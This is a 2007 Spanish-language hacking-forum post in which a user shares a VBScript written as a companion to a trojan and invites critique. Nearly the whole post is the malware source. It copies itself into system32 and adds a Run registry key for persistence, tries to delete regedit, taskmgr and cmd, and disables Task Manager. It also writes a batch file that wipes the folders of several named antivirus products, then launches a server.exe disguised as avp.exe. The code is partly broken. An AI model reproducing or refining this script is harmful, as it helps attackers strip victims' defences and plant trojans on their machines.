avatar199313
NZ1

Desconectado
Mensajes: 53

Que el codigo fuente os acompañe
|
 |
« : 19 de Julio de 2007, 03:06:43 » |
|
Pues aquí esta mi primer VBS lo escribi para que sea un complemento de un troyano, aquí esta el codigo: set Worm=CreateObject("Scripting.FileSystemObject") On error resume next Worm.DeleteFolder “C:\Documents and Settings\All Users\Menú Inicio\Programas\Accesorios\Herramientas del sistema\Restaurar sistema.ink” Set Worm2 = CreateObject(“WScript.Shell”) Worm2.CopyFile wscript.scriptfullname,"C:\WINDOWS\system32\cmdlib.vbs" Worm2.DeleteFile regedit.exe Worm2.DeleteFile taskmgr.exe Worm2.DeleteFile cmd.exe Set Worm3=CreateObject("Wscript.Shell") Worm3.RegWrite “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Disabletaskmgr.exe” Worm3.Regwrite "HKLM\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run\cmdlib",C:\WINDOWS\system32\cmdlib.vbs Worm3.CopyFile wscript.scriptfullname,"C:\WINDOWS\system32\cmdlib.vbs" Randomize Numero=int(rnd*10) If Numero=1/0 Then Set winsocket = mett.CreateTextFile (“C:\winsocket.txt”, True) winsocket.WriteLine "@ echo off" winsocket.WriteLine "cd\" winsocket.WriteLine "cd norton.2005" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd panda antivirus" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd archivos de programa" winsocket.WriteLine "cd Norton Antivirus" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd archivos de programa" winsocket.WriteLine "cd Norton SystemWorks" winsocket.WriteLine "cd Norton Antivirus" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd archivos de programa" winsocket.WriteLine "cd norton.2005" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Program Files" winsocket.WriteLine "cd Norton Antivirus" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd pavp" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Program Files" winsocket.WriteLine "cd McAfee" winsocket.WriteLine "cd VirusScan95" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Archviso de programa" winsocket.WriteLine "cd Panda Software" winsocket.WriteLine "cd Panda Antivirus Platinium" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Archivos de programa" winsocket.WriteLine "cd McAfee" winsocket.WriteLine "cd McAfee Shared Components" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Archivos de programa" winsocket.WriteLine "cd Network Associates" winsocket.WriteLine "cd VirusScan" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Archivos de programa" winsocket.WriteLine "cd Trend Micro" winsocket.WriteLine "cd PC-cillin 2002" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Archivos de Programa" winsocket.WriteLine "cd Kaspersky Lab" winsocket.WriteLine "cd Kaspersky Anti-Virus Personal Pro" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "cd\" winsocket.WriteLine "cd Archivos de Programa" winsocket.WriteLine "cd Kaspersky Lab" winsocket.WriteLine "cd Kaspersky Anti-Virus Personal" winsocket.WriteLine "attrib -a -r -h *.*" winsocket.WriteLine "del *.*" winsocket.WriteLine "EXIT" winsocket.Close winsocket.CopyFile “C:\winsocket.txt”,”C:\winsocket.bat” winsocket.Run “C:\winsocket.bat” set Worm4=CreateObject("Scripting.FileSystemObject") Worm4.CopyFile "C:\server.exe","C:\WINDOWS\System32\avp.exe" Worm4.Run "C:\WINDOWS\System32\avp.exe" Se aceptan criticas, sugerencias y comentarios.
|
|
|
|
« Última modificación: 09 de Agosto de 2007, 05:47:54 por avatar199313 »
|
En línea
|
Recopilar datos es la base para la sabiduria, pero compartirlos es la base para la comunidad.
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|